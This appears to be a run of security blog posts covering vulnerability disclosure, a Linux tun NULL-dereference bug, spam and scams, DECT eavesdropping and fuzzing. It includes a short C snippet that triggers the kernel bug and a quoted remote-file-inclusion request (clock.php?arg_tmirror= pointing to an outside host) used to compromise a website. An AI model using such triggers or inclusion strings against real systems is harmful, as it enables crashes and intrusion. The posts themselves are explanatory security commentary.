I just read the sad news that st0rke, also known as the maintainer and founder of milw0rm has passed away, the problem with this news item is that it very difficult to judge whether or not it is true, as the source is not “the official news media” you would normally trust.

This of course will not hit CNN, FOX, or any other news agency, and will be posted on, usually, underground mailing list or blog which might or not have a hidden agenda in respect to giving out such news items.

This if of course not the first time someone was claimed to have died, with only rumours circulating and then finally after some time, it was determined to be true, as their site was no longer being updated, and emails sent to him never got a reply.

If it is in fact true, the story about str0ke, I am sadden to hear it, and I send my condolences to his family, wife and 4 kids.

We purchased security vulnerabilities as part of our SSD program from a researcher who has conducted extensive audit on a popular bulletin board system, IPB. For those not familiar with it, it is a good product, quite common, and well supported by a commercial company called Invision Power. The audit revealed a few high risk issues in the program allowing remote attackers to gain access to entries found in the database with minimal requirements on the attacker’s side.

After verifying the issue we contacted the company in several ways, emailing several addresses, but failed to “reach” anyone. We received several automated responses, and even our inquiry to their sales emails, returned nothing, are we missing something?

From their site it is apparent that support is provided only to paying customers, fair enough, but I am not a customer, I am trying to help them. I am willing to give them the security researcher we paid for, for FREE, yes free, they aren’t asked to pay anything for the vulnerabilities discovered, they are only asked to fix them, which will benefit them for sure.

If anyone has an idea how we could reach Invision Power’s guys/developers, please feel free to contact me at noamr[at]beyondsecurity.com.

A NULL reference vulnerability in the tun source code of the Linux kernel has been discovered to be “immune” if the code is audited, and vulnerable once GCC has put into place its code optimizations.

The vulnerability allows executing arbitrary code and gaining root access.

An exploit has been released proving that the vulnerability is not just “theoretically” there, but can be actually exploited.

Need we say Black Box Fuzzing? a API fuzzer such as beSTORM would have easily caught as beSTORM can be told to open the /dev/net/tun driver and write data directly to it, one of the first tests it will preform will be the “old” nothing (NULL) data transfer.

BTW: If you want to test the vulnerability on your kernel here is a code snip:

int fd;
struct pollfd pfd;
fd = open("/dev/net/tun", O_RDWR);
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd, 1, 0);

In recent news, a posting on slashdot talked about: Cruising Fisherman’s Wharf For New Passports’ Serial Numbers as a means of gaining access to sensitive information as well as being able to secretly do surveillance on people without their concent.

Is it just me, or have everyone forgotten the little, sometimes more than one, devices they take around with them all the time called cellphones?

Those tiny devices are perfect for surveillance, they emit a signal, when the signal is too weak to reach a cell site they try harder, they - if enabled - broadcast their GPS location via Google Latitude, and can allow anyone with the right equipment - not expensive as you would think - to track you down.

I think that the RFID and Passports “noise” being generated is just a smoke screen to distract people from the already existing and being used ability of governments and bad people of course, to track you down using the signalls emitted by your cellphone.

RFID unlike cellphones, can be easily blocked by simple means, for example putting your passport into a aluminium/metal sleeve, while I don’t see anyone doing the same to their cellphones

I received this email today:

Good morning!

I inform you about site http://carder.su where people trade in stolen credit cards. As i’m a holder of visa classic i’m sincerely
exasperated at appearing such sites in your hosting. I beg of you to take strong measures and don’t be indifferent to heart-break of other people. This complaint will be sent to the FBI.

Best regrads, Jon Shirov.

At first I was shocked, why would someone allow such a site to still be up even though someone reported it to the FBI. I had to do something.

Rushing to the rescue I looked at the site and it appears to be a pretty straight forward scam-sell site, you come there and buy stolen goods.

Why have I been notified only now I wondered… I looked back in my spam log and what do you know the same email appears more than once in my spam folder with different names, dates and of course email addresses

I am not sure what the scam/spam’s purpose is, apparently they want you to go to their site and see what they have to offer - you might be a potential customer to their operation.

I of course didn’t dig in to the site, nor am I interested in buying anything found there - on the other hand I will also not report this to the FBI as the site is not hosted inside the United States (It is hosted in Russia), nor is its domain under a US registrar (ends with a SU).

Whoever knows of a place to report such sites to please let me (us) know.

A short list of legitimate emails you will never get, if you have something else feel free to add:

* Lottery winnings - Microsoft is the big winner here, they keep sending me winning notifications, but I just don’t collect
* Your doctor’s prescription (probably some obscure medicine might go through, while most won’t) - to buy “cheap” fake medicine
* Your Antivirus renewal notice - trying to get you to install some form of malware
* Your bank’s security notice, and statement - of course its phishing scams
* Paypal payments being done to your name or from your name - phishing scams mainly
* Job offers - I get these money “mule” offers and get paid per call spam
Anything I missed?

What started off nicely in 1992 and promised the much needed privacy to cordless communication at home, has been brought into a halt a few days ago with the practical approach to eavesdropping on DECT communication.

DECT or Digital Enhanced Cordless Telecommunication is a widely used standard for cordless devices, mainly phones, but not limited to it, several POS or Point of Sale devices as well use the standard to communicate in a cheap and secure manner.

The DECT standard itself was not broken, but rather using a cheap off-the-shelf device that is able to receive (not yet transmit) DECT based data, the researchers have been able to prove that eavesdropping on the communication channel is possible.

Most interesting to me as a reader of the paper is that what stopped people from ‘breaking’ it till now, was the lack of hardware, or moreover the lack of cheap hardware, to experiment with, now with the availability (it has been around for a while) of COM-ON-AIR device and its character device (or raw software driver) things have been made a lot easier.

You can read more on this at deDECTed.org

Following up on my previous post on spam, it seems that spam has now gone another step and become not just unreadable - foreign language - but also unreadable to the un-computerized eye:

Subject: Please confirm your message

Body:

IURPQ1RZUEUgSFRNTCBQVUJMSUMgIi0vL1czQy8vRFREIEhUTUwgNC4wIFRyYW5zaX
Rpb25hbC8vRU4iPg0KPEhUTUw+PEhFQUQ+DQo8TUVUQSBodHRwLWVxdWl2PUNvbnRlb
nQtVHlwZSBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMiI+DQo8L0hF
QUQ+DQo8Qk9EWT48YSBocmVmPSJodHRwOi8vY291cnNlbWlnaHQuY29tLyIgdGFyZ2V0P
SjfYmxhbmsiPg0KPGltZyBzcmM9Imh0dHA6Ly9jb3Vyc2VtaWdodC5jb20vOGR2czkuanBnIiBib
3JkZXI9MCBhbHQ9IkhhdmluZyB0cm91YmxlIHZpZXdpbmcgdGhpcyBlbWFpbD8NCkNsaWNr
IGhlcmUgdG8gdmlldyBhcyBhIHdlYnBhZ2UuIj48L2E+PC9CT0RZPjwvSFRNTD57L0JBU0
U2NF9FTkNPREVEfQ0KDQoAAAAAAAAAAAAAAAA=

Wow that is nice, I would sure want to buy an IURPQ1…

This is plain silly it is a Base64 encoded message, but why would my reader open it?

There is indication in the email headers that this is Base64 encoded, but I can’t understand what kind of reader will even try to open it as it seems that base64 encode content inside a body is not common practice unless it is part of a multipart message.

Those wondering, the email’s intention is to show you an HTML  that sells you fake? real? pills.

Yes snooping on someone else’s GoogleTalk is no big deal if you know their password, but what is interesting that unlike other chat clients like Skype, MSN and others GoogleTalk will allow you to do so simultaneously.

You can connect to the GoogleTalk server while another user using the same username and password is also connected to the GoogleTalk server.

This neat feature, probably stems from the fact that Google supports web based chat in a constantly refreshing web page (unlike MSN which launches a separate window) allows you to see incoming responses and messages being sent to your target without needing to do anything.

BTW Google, don’t fix this, I find it useful for my BlackBerry and PC chat sharing - basically never needing to logon/logoff on my PC/BlackBerry they are both constantly connected to the Google Talk servers.

UPDATE This post is not related to the recently released NSA patent on Snoop detection

With the recent introduction of a native SCTP library into beSTORM you can easily fuzz your SCTP based protocols with beSTORM.

This includes all our existing protocols as well as SCTP dedicated protocols such as M3UA and MGCP.

SCTP for those that aren’t familiar with it is a fairly common protocol in the VoIP and Telecommunication industry it sits upon IP and ‘replaces’ the TCP/UDP layers. It has several benefits over TCP and UDP but it is mainly used because it has been endorsed by the SIGTRAN group as the primary way of communication between two telecommunication providers.

Many administrators blindly block anything that isn’t running on either port 80 (http), 443 (https) or 22 (ssh). Their claim is that nothing good can work any other port. This causes their uses to get frustrated when they want to use anything else that runs on any other port.
I am not talking about P2P or any other ‘evil’ programs which are pretty good at bypassing your restrictio on their own, Skype is one such example, I am talking about for example one of your engineers wanting to get techsupport but has his corporate VPN access blocked as most VPNs require at least a non-80, 443, 22 port to be open.

In such cases (as VPN), the techsupport guy will find a way around your restriction, perhaps using port 443 to tunnel the traffic through, even though its not really SSL going inside there . The smart administrator will use a Proxy or a Content Filtering agent to prevent such things, so a smart techsupport guy will tunnel everything via SSH, or even use HTTPS to tunnel the data (there are several solutions that do that).

My point is that, blindly blocking will give you the benefit for stopping the common user, but will frustrate a techsupport guy to to the point that he will find a way to bypass it. I suggest that you ‘give’ the techsupport guy a hand, understand what he needs, and give him that. Its better than him bypassing your restriction.

I am sure the readers have additional examples that can strengthen this point.

Yes, this should have brought tears into your eyes too Spam Volumes Drop by Two-Thirds After Firm Goes Offline, but luckily I cried too soon, I have seen spam amounts on the increase in the past 2 weeks. And unlike previous spam that my bogofilter and spamassassin were able to handle, this new spam is something that it can’t - or at least can’t yet.

I wonder what happened to make spam more ‘intelligent’, one thought that comes to my mind is that since now the massive botnet that was used to send spam is owned by someone else, the spam now looks different - something else generates it, while the same network sends it out.

I hope the catch the guy whose keeping this network alive, and take it down once more, we deserve the relief from spam for a few days at least

On a side note, I have seen an increase on foreign spam, natively written Russian, Chinese , and Japanese spam - this is even more silly than regular English written spam, as I can’t even start to wonder what they are trying to sell me

Even to right spam you apparently need:

1) A spell checker

2) Understand what the words mean

This is the spam email I received, why would someone even want to answer it?

Hello,
I am Ming Yang,i have an obscured busines suggestion for you.please
Contact me for further details on ( [removed]@yahoo.com.hk )

Kind Regards
Ming Yang
Mail: [removed]@yahoo.com.hk

I recently received an email from a co-worker which upon clicking on it (to preview it) my email reader crashed.

The crash was so weird, that I had to try it again I reopened the email reader and clicked on the email again, of course it crashed once more.

I investigated a bit further on the matter, and I noticed that the email contained a TNEF file which my email reader tried to automatically parse, and apparently failed due to a bad memcpy directive (copying more than you have allocated space for).

Once I zero in on what is triggering it, I will report it to the vendor.

I recently received a spam email that wants me to buy solar lamps for the garden, my first impulse of course was to delete it. But I had to admit, I wanted those solar lamps, they looked nice, and the price was ok.

I have no idea what to do now, on the one hand this was sent as part of a spam campain, buying it might prove to be:

1) Fraudulent - pay get nothing (best chances)
2) A scam - pay get nothing worth your money (moderate chances)
3) A legitimate deal - pay and get what I paid for (slim chances)
In addition of course to the fact that if I buy it, I am proving the spammer’s agenda, that someone wants their merchandise and this is their only way to reach him.

What do you guys suggest I do?

You are probably reading this post, asking yourself “why does he even let me know”. So I will start by saying that my boy had his birthday a few months ago, so this post isn’t about him, it’s completely unrelated.

It has to do with this site: http://babycaleb.fort unecity.co.uk/ (I broke the link so people do not JUST jump and go to it)

This site isn’t mine, it was used to hack a friend’s web site, so I took to myself to look into it.

This site hosts a few pictures, some are quite weird to put online (hint to: My Wifes Scar), while others are completely harmless (hint to: My baby).

The issue is not in the pictures but rather what is there and cannot be seen without doing a bit of digging.

I will give some more hints in a follow-up post, if no one else comes up with what does this site do to you.

(Another hint, the site of my friend was hacked using this link: /clock.php?arg_tmirror=http://babycaleb.fortu necity.co.uk/index.htm)